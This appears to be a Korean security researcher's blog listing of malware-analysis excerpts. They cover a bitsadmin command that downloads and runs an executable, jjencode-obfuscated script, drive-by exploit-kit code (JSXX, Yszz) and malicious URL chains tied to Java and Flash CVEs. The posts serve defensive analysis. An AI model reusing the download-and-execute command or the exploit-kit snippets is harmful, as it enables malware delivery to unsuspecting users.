악성코드 분석글을 읽다 윈도우 환경에서 wget 명령어와 유사하게 파일을 다운로드 할 수 있는 기본 명령어가 있어 메모해 둡니다. ping 127.0.0.1 -n 3>null&bitsadmin /transfer myjob /download /priority high http://example.com/a.bin "%APPDATA%\a.exe">nul&start %APPDATA%\a.exe 본 명령어는 Windows 7 이후부터 기본 명령어로 탑재된 것으로 보입니다. 출처 : https://isc.sans.edu/forums/diary/Microsoft+BITS+Used+to+Download+Payloads/21027
한국 Lulzsec 공격 분석
1. 개요 한동안 스크립트 분석을 하지 않다 최근 lulzsec이 한국에서 활동한다는 소식을 접하고 관련 샘플을 찾아서 분석을 해봤습니다. 이 샘플이 그 샘플이 맞는지는 모르겠으나 허접하게 작성되었네요 -_-; 관련기사 : http://dailysecu.com/news_view.php?article_id=8208 2. jjencode 난독화 부분 우선 원본 코드 입니다. jjencode로 난독화 되어 있습니다. $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$.$_$_+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+"('"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"___"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"____"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"____\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"______/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\__//"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\__/_____\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"_/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\_/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+":"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"//_____\\\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+":"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+":"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+".."+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"::"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"::"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+":|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+""+$.$__+$.___+"\_____/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|\\"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+"/_\\"+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+"____"+$.$__+$.___+"||"+$.$__+$.___+"______"+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+"_-_"+$.$__+$.___+"/"+$.$__+$.___+"\\"+$.$__+$.___+"_-_-_"+$.$__+$.___+"/"+$.$__+$.___+"|"+$.$__+$.___+"______"+$.$__+$.___+"|/_/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"_\\_-_-_-_/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/____"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\______\\_________"+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+"\"+$.__$+$.$_$+$.$$_+"\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"');"+""")())(); 난독화 되어 있는 코드를 디코딩 하면 아래와 같은 결과가 나옵니다. alert(' ___ …
JSXX 0.44 VIP
최근 경향은 대부분 자바 취약점이네요. 간단하게 한번 디코딩 하여 살펴보았습니다. http://5b8.co/m L http://5b8.co/m/index.html L http://5b8.co/m/swfobject.js L http://5b8.co/m/jpg.js L http://5b8.co/m/jvTDIYE7.html L http://5b8.co/m/GAHNr0.html 원본 코드는 아래와 같습니다. <script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script type="text/javascript"> var YdgJw3=navigator.userAgent.toLowerCase(); var SPRB3="1"+"1"+"1"; if(document.cookie.indexOf("xcDHL4=")==-1 && YdgJw3.indexOf("linux")<=-1 && YdgJw3.indexOf("bot")==-1 && YdgJw3.indexOf("spider")==-1) { var pxtXtt1=deconcept.SWFObjectUtil.getPlayerVersion(); var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); SPRB3="0"; document.cookie="xcDHL4=Yes;path=/;expires="+expires.toGMTString(); FTYdkdd0="1";delete FTYdkdd0;try{FTYdkdd0+="0"+"0"+"0"+"0"+"0"+"0"+"0"+"0";}catch(e){var Huaqmm1="1";XtpkDF6 …
Yszz 1.5 vip 관련 코드 확인
오랜만에 보여서 한번 살펴봤는데 예전과 많이 달라져서 기록해 둔다. http://festival.cocobau.com/adm_site/e_show/e_th_ad.js L http://205.164.25.148/pic/img.js L http://205.164.25.148/pic/img.html L http://205.164.25.148/pic/XLL0zxmA.jpg (CVE?) L http://205.164.25.148/pic/rKQeVOG.jpg (CVE-2011-3544) L http://205.164.25.148/pic/9O4v7e.html (CVE-2011-1255) L http://205.164.25.148/pic/yNDGhP.js L http://205.164.25.148/pic/bmrYt.html (CVE-2012-1889) L http://205.164.25.148/pic/swfobject.js L http://205.164.25.148/pic/jpg.js L http://205.164.25.148/pic/css.html img.html 파일을 디코딩 해보도록 하자. "Yszz 1.5 vip" 라는 주석이 들어가는게 특징으로 보인다. <script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script language =javascript> …
또 추가된 온라인게임핵 악성코드 전파용 취약점 (CVE-2012-0754)
국내에서 전파되는 온라인게임핵 악성코드 전파용 취약점이 또 하나가 새롭게 추가가 되었습니다. CVE-2012-0754 : http://www.exploit-db.com/exploits/18572/ Exploit-DB 사이트에 올라오자 마자 바로 자기네들에 맞게 수정하여 전파하네요. 아래는 이번에 국내에서 발견된 해당 취약점과 관련된 SWF 파일 내부에 작성되어 있는 액션 스크립트 입니다. 이전에 발견된 CVE-2011-2140 취약점과 아주 유사하게 구성되어 있으며 취약점과 관련된 MP4 파일명도 CVE-2011-2140 취약점은 ea.jpg 그리고 이번에 …
새로운 난독화 해제 방법 (Encrypt By Dadong’s JSXX 0.41 VIP)
Encrypt By Dadong blahblah 라고 주석을 남기던 난독화 코드가 버전업을 했습니다. 이제는 아래와 같은 주석을 남기네요. Encrypt By www.krmeok.com's JSXX 0.41 VIP Encrypt By 도메인명's JSXX 0.41 VIP 아마도 "Encrypt By Dadong" 이라는 문자열로 시그니처를 만들기 시작해서 그것을 회피하고자 바꾼 것으로 추측됩니다. 추가로 디코딩 방법은 0.41로 버전업 하기 전과 동일한 방법으로 풀리며, 디코딩 하는 새로운 …
새롭게 추가된 온라인게임핵 악성코드 전파용 취약점 (CVE-2011-3544)
최근 국내에서 전파되는 온라인게임핵 악성코드와 관련하여 추가된 취약점이 있어 공유합니다. http://www.yo****ow.com/63/pps.html L http://www.yo****ow.com/63/jpg.js 이번주부터 추가되어 전파되는 것으로 보이며, CVE-2011-3544 (Oracle Java Applet Rhino Script Engine Remote Code Execution) 취약점으로 Oracle Java SE JDK and JRE 7 and 6 Update 27 이전 버전이면 감염이 됩니다. http://www.yo****ow.com/63/pps.html 코드를 살펴보면 이전과는 다른점을 확인할 수 있습니다. <script src=jpg.js></script> <script> …
새로운 URL 암호화 방법
최근 악성코드 중 아래와 같은 페이지에 접속하여 특정 명령을 받아 실행하는 악성코드를 확인하였습니다. hxxp://211.255.23.46/counter/update.txt 위 주소에 접속하면 아래와 같이 숫자만 나타나게 됩니다. 049058104116116112058047047049050049046050053052046049054053046049048053047105099111110115047107114046101120101 관련 악성코드를 분석해본 결과 예전에는 단순히 주소 혹은 XOR로 암호화 하였으나 이번엔 좀 새로운 패턴으로 한것을 확인하였습니다. 복호화는 아래 페이지에서 가능하도록 기능을 추가 하였습니다. http://119.194.217.188:8080/Honeypot/ ‘new’ 텍스트 박에서 해당 값을 입력하면 아래와 …
난독화 코드 그리고 제작자의 실수?
최근 난독화 코드 중 새롭게 작성된 코드를 확인하여 공유 합니다. 우선 코드는 아래와 같습니다. <script> var a1 = "ABCDEFG"; var a2 = "HIJKLMNOP"; var a3 = "QRSTUVWXYZabcdef"; var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"="; function mydata(input){ var output=""; var chr1,chr2,chr3=""; var enc1,enc2,enc3,enc4=""; var i=0; var base64test=/[^A-Za-z0-9\+\/\=]/g; input=input.replace(/[^A-Za-z0-9\+\/\=]/g,""); do{ enc1=keyStrs.indexOf(input.charAt(i++)); enc2=keyStrs.indexOf(input.charAt(i++)); enc3=keyStrs.indexOf(input.charAt(i++)); enc4=keyStrs.indexOf(input.charAt(i++)); chr1=(enc1<<2)|(enc2>>4); chr2=((enc2&15)<<4)|(enc3>>2); chr3=((enc3&3)<<6)|enc4; output=output+String.fromCharCode(chr1); if(enc3!=64){output=output+String.fromCharCode(chr2);}; if(enc4!=64){output=output+String.fromCharCode(chr3);}; …
Adobe Flash Player CVE-2011-2140 취약점 간단 분석
금일 분석하다 처음보는 취약점을 확인하여 기록합니다. 우선 특정 사이트에 아래와 같이 삽입이 되어 있었습니다. function user(){ var January="<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n"+ "<object width=\"550\" height=\"400\">\r\n"+ "<param name=\"movie\" value=\"done.swf\">\r\n"+ "<embed src=\"Birthday.swf\" width=\"550\" height=\"400\">\r\n"+ "<\/embed>\r\n"+ "<\/object>" ; var info = navigator.userAgent.toLowerCase(); var win = (navigator.platform == "Win32") || (navigator.platform == "Windows"); var ck=code(); var March = info.indexOf('msie 7.0'); var …